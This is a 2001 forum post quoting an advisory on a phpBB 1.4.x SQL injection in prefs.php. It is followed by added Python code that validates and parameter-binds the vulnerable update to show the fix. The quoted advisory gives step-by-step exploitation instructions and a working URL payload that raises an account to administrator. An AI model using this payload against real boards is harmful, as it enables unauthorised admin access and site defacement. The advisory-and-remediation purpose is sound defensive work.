wbierman
17th August 2001, 14:43
Are we affected by any of this?
phpBB Exploit Released and Being Used
--------------------------------------
phpBB is an open source bulletin board program that uses
a MySQL database backend and provides support for public
and private forums. (See http://www.phpbb.com/)
A little over a week ago, kill-9 of modernhackers.com posted
a phpBB 1.4.x exploit that can give remote attackers
administrative access to a vulnerable bulletin board.
http://archives.neohapsis.com/archives/bugtraq/2001-08/0056.html
Simple step-by-step instructions on how to exploit the
vulnerability are provided:
1. Register an account on a phpBB board version 1.4.x.
2. Enter the URL given below. Replace "sitename" with
the real site name, and replace l337h4x0r with your
username.
3. Click on "Administration Panel" near the bottom of
the page.
Example URL:
http://sitename/phpBBfolder/prefs.php?save=1
&viewemail=1',user_level%3D'4'%20where%20username%3D'l337h4x0r'%23
The problem is due to inadequate checking of user input.
The URL above inserts an extra section:
,user_level='4' where username='l337h4x0r'
into an SQL statement in prefs.php via the $viewemail variable:
$sql_query = "UPDATE users SET
user_viewemail='$viewemail',
user_theme='$themes',
user_attachsig='$sig', ...
This hack is actively being used to deface phpBB 1.4.x
bulletin-board-based websites.
A suggested fix has been posted here:
http://archives.neohapsis.com/archives/bugtraq/2001-08/0060.html
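The advisory shows that $viewemail is spliced straight into the UPDATE text. The following is an added example, not code from the advisory or from phpBB, written in Python with an in-memory SQLite stand-in for the MySQL users table (the column names come from the quoted UPDATE statement; the rest of the schema is assumed). It shows the hardened equivalent of the prefs.php update: validate the preference as a 0/1 flag and bind it as a query parameter, and it also shows that parameter binding alone keeps the injected string from touching user_level.

```python
import sqlite3

# Constructed stand-in for the phpBB 1.4.x "users" table. The column names
# come from the advisory's UPDATE statement; the rest of the schema is assumed.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, "
                 "user_viewemail INTEGER, user_level INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [("alice", 0, 0), ("l337h4x0r", 0, 0)])
    return conn

def validate_flag(value):
    """viewemail is a yes/no preference: accept exactly "0" or "1"."""
    if value not in ("0", "1"):
        raise ValueError("viewemail must be 0 or 1")
    return int(value)

def save_prefs(conn, username, viewemail):
    """Hardened form of the prefs.php UPDATE: validate the value, then bind it
    as a parameter so it is never parsed as part of the SQL statement."""
    flag = validate_flag(viewemail)
    conn.execute("UPDATE users SET user_viewemail = ? WHERE username = ?",
                 (flag, username))
    conn.commit()

def save_prefs_bound_only(conn, username, viewemail):
    """Binding without validation: the raw string is stored as data, so the
    privilege column is still untouched, but junk reaches the table."""
    conn.execute("UPDATE users SET user_viewemail = ? WHERE username = ?",
                 (viewemail, username))
    conn.commit()

def user_row(conn, username):
    return conn.execute("SELECT user_viewemail, user_level FROM users "
                        "WHERE username = ?", (username,)).fetchone()

# The decoded viewemail value from the advisory's example URL.
INJECTED = "1',user_level='4' where username='l337h4x0r'#"

def demo():
    conn = make_db()
    save_prefs(conn, "alice", "1")          # legitimate preference change
    try:
        save_prefs(conn, "l337h4x0r", INJECTED)
        rejected = False
    except ValueError:
        rejected = True                     # validation stops it at the door
    save_prefs_bound_only(conn, "l337h4x0r", INJECTED)
    return rejected, user_row(conn, "alice"), user_row(conn, "l337h4x0r")
```

Validation is the fix to apply in prefs.php; binding is the defence in depth that keeps an unvalidated value from ever reaching user_level.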